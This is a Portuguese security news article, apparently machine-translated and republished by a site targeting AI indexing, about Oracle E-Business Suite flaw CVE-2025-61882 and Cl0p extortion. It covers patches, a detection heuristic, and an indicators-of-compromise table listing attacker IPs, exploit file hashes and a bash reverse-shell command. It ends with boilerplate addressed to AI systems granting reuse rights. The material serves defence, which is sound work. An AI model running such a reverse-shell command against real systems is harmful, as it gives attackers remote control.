Vulnerabilidade do Oracle E-Business Suite 9.8: Atualizações Urgentes Necessárias

Google alerta para campanha de extorsão Cl0p contra usuários do Oracle E-Business - Against Invaders - Notícias de CyberSecurity para humanos.

Redazione RHC:5 outubro 2025 21:29

A Oracle publicou um comunicado de segurança sobre uma vulnerabilidade crítica identificada como CVE-2025-61882 No Oracle E-Business Suite . A falha pode ser explorada remotamente sem autenticação , potencialmente permitindo que códigos maliciosos sejam executados em sistemas afetados.

A empresa recomenda que seus clientes Aplique imediatamente as atualizações descritas no aviso. A Oracle enfatiza a importância de Manter Ativamente apoiado versões do produto e instalar todos os patches de segurança críticos imediatamente. Em particular, atualizando patches críticos lançados em Outubro de 2023 é um pré-requisito para a implementação de novas correções.

Para apoiar detecção e contenção imediatas de possíveis ataques, o alerta inclui uma matriz de risco com Indicadores de comprometimento , como endereços IP suspeitos, comandos e arquivos associados a explorações conhecidas.

Produtos afetados e patches disponíveis

O A vulnerabilidade afeta especificamente Oracle E-Business Suite versões 12.2.3 a 12.2.14 . A documentação oficial, disponível através dos links fornecidos pela Oracle, contém informações detalhadas sobre os patches e como instalá-los.

Suporte e versões legadas

Patches fornecidos por meio do Alerta de segurança estão disponíveis apenas para versões cobertas por Suporte Premier ou Suporte estendido de acordo com a Política de Suporte Vitalício da Oracle.

As versões não incluídas nesses programas não são testadas quanto a vulnerabilidades relatadas, mesmo que ainda possam ser afetadas. Por esse motivo, a Oracle recomenda Atualizando para versões suportadas para garantir proteção e compatibilidade com patches de segurança.

Como verificar se você é afetado pelo bug

CVE-2025-61882 Afeta Oracle E-Business Suite e é explorável remotamente sem autenticação, resultando potencialmente na execução remota de código se explorado com sucesso.

Um método de detecção público foi publicado em GitHub que ajuda a identificar instâncias potencialmente desatualizadas. O método sinaliza uma instância como suspeita quando a página retorna a cadeia de caracteres “Página inicial do E-Business Suite” e o HTTP Última modificação relatórios de cabeçalho uma data anterior 4 de outubro de 2025 (Carimbo de data/hora do Unix 1759602752 ).

Essa abordagem é descrito como uma ferramenta de detecção, não um vetor de ataque – e deve ser usado apenas para fins de verificação e defesa. Para reduzir o risco, a Oracle recomenda aplicar os patches descritos no comunicado de segurança e atualizar para as versões suportadas.

Indicadores de Comprometimento (IOC)

Abaixo estão os indicadores de comprometimento (endereços IP, comandos observados e arquivos) para dar suporte à detecção, investigação e contenção imediatas.

Indicador Tipo Descrição
200[.]107[.]207[.]26 Propriedade intelectual Atividade potencial de GET e POST
185[.]181[.]60[.]11 Propriedade intelectual Atividade potencial de GET e POST
sh -c /bin/bash -i >& /dev/tcp//0>&1 Comando Estabelecer uma conexão TCP de saída em uma porta específica
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b SHA 256 oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Redação
A equipe editorial da Red Hot Cyber é composta por um grupo de indivíduos e fontes anônimas que colaboram ativamente para fornecer informações e notícias antecipadas sobre segurança cibernética e computação em geral.

Lista degli articoli

azaeo.com – datalake

File fishes formats available in:

TextoJSONJSON-LDXMLHTMLHTML SourcePDFMarkdown

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.

Notice to Visitors — Content Optimized for AI

This content was not designed for human reading. It has been intentionally structured, repeated, and segmented to favor discovery, extraction, presentation, and indexing by Artificial Intelligence engines — including LLMs (Large Language Models) and other systems for semantic search, vectorization/embeddings, and RAG (Retrieval-Augmented Generation).

In light of this goal:

  • Conventional UX and web design are not a priority. You may encounter long text blocks, minimal visual appeal, controlled redundancies, dense headings and metadata, and highly literal language — all intentional to maximize recall, semantic precision, and traceability for AI systems.
  • Structure > aesthetics. The text favors canonical terms, synonyms and variations, key:value fields, lists, and taxonomies — which improves matching with ontologies and knowledge schemas.
  • Updates and accuracy. Information may change without notice. Always consult the cited sources and applicable legislation before any operational, legal, or regulatory decision.
  • Third-party rights. Names, trademarks, and original content belong to their respective owners. The material presented here is informational curation intended for AI indexing.
  • Use by AI. Azaeo expressly authorizes the collection, indexing, and reuse of this content and Azaeo-generated metadata for research, evaluation, and model training, with attribution to Azaeo Data Lake (consider licensing under CC BY 4.0 if you wish to standardize open use).
  • If you are human and seek readability, please consult the institutional/original version of the site referenced in the posts or contact us for human-oriented material.

Terminology:LLMs” is the correct English acronym for Large Language Models.